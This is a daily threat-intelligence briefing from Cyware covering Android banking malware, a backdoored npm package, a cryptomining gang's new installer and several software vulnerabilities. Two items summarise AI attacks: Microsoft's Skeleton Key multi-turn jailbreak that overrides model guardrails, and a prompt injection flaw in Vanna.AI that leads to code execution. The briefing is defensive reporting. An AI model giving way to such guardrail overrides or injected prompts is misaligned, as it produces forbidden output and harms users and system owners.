Cookie Settings

This website uses cookies and similar technologies to provide essential functionality and improve your experience. Some features, such as demo scheduling and chat support, require marketing cookies to function. By clicking "Accept All", you consent to all cookies. Alternatively, you can customize your preferences, but note that declining marketing cookies will limit certain website features.

Cyware Daily Threat Intelligence

Cyware Daily Threat Intelligence - Featured Image

Daily Threat Briefing Jun 27, 2024

A chilling new threat called Snowblind is sweeping through Southeast Asia, stealthily bypassing defenses of Android banking apps and exploiting accessibility services to leave banking customers vulnerable to financial fraud. Meanwhile, the 8220 Gang has updated its arsenal to include k4spreader, a new tool written in CGO mode that provides system persistence, downloads and updates itself, and releases other malware payloads like the Tsunami botnet and PwnRig miner.

On the vulnerability front, Microsoft warned of a new jailbreak attack dubbed Skeleton Key that can allow adversaries to manipulate AI models. This attack involves using a multi-turn strategy to override the guardrails of an AI model to produce forbidden content or force it to make unintended decisions.

Top Malware Reported in the Last 24 Hours

New threat to mobile banking

A new malware called Snowblind is targeting banking customers in Southeast Asia, resulting in financial losses and fraud. Snowblind uses a unique technique that disables Android banking apps' ability to detect malicious modifications, making it difficult to detect the malware. It exploits accessibility services on apps, which are designed to help users with disabilities use their devices effectively.

Hidden backdoor in NPM package

ReversingLabs found a malicious npm package called "legacyreact-aws-s3-typescript" that is meant for AWS users. The malicious versions of the package (1.1.9, 1.2.1, 1.2.2, and 1.2.4) contained a post-install script that downloaded and executed a second-stage ELF file, which was a simple backdoor that connected to a malicious IP address. The malicious versions were published several months after the original versions, suggesting the package was hijacked by a malicious actor.

Cryptomining gang updates its arsenal

XLab researchers spotted k4spreader, a new tool developed by the "8220" cryptomining gang that first appeared in February 2024. It is an installer written in CGO mode that provides system persistence, downloads and updates itself, and releases other malware for execution. The tool is used to deploy payloads like the Tsunami botnet and PwnRig miner. It is capable of closing the firewall and cleaning up other malicious processes.

Top Vulnerabilities Reported in the Last 24 Hours

Skeletons in your AI closet?

Microsoft shared its findings about a new jailbreak attack on AI models called Skeleton Key. This attack involves using a multi-turn strategy to override the guardrails of a model. Once the guardrails are bypassed, the model can produce forbidden content or force it to make decisions that go against its intended rules. Skeleton Key relies on the attacker having legitimate access to the AI model.

A dozen flaws in TP-Link Omada

Cisco Talos researchers found twelve unique vulnerabilities in the TP-Link Omada system, a widely used software-defined networking solution for SMBs. The specific vulnerabilities are related to various functionalities of specific TP-Link devices like wireless access points, gigabit VPN routers, and the Omada software controller. These vulnerabilities can result in remote code execution, denial of service, arbitrary command execution, and device reset to factory settings.

AI library at risk via prompt injection

Researchers at JFrog uncovered a high-severity security flaw (CVE-2024-5565) in the Vanna.AI library, a Python-based machine learning tool that allows users to interact with SQL databases using natural language queries. This vulnerability, which has a CVSS score of 8.1, could be exploited to achieve RCE through prompt injection techniques. The flaw specifically affects the "ask" function in Vanna.AI, which translates user prompts into SQL queries using a large language model (LLM).

PoC exploit out for Fortra FileCatalyst Workflow

A critical SQL injection vulnerability (CVE-2024-5276) was recently discovered in Fortra FileCatalyst Workflow, a component of the FileCatalyst enterprise file transfer solution. The vulnerability allows attackers to create administrative user accounts, modify and delete data in the application database, and potentially gain full control of vulnerable systems. A PoC exploit for the vulnerability was published by Tenable. The vulnerability affects all versions of FileCatalyst Workflow from 5.1.6 Build 135 and earlier.

Related Threat Briefings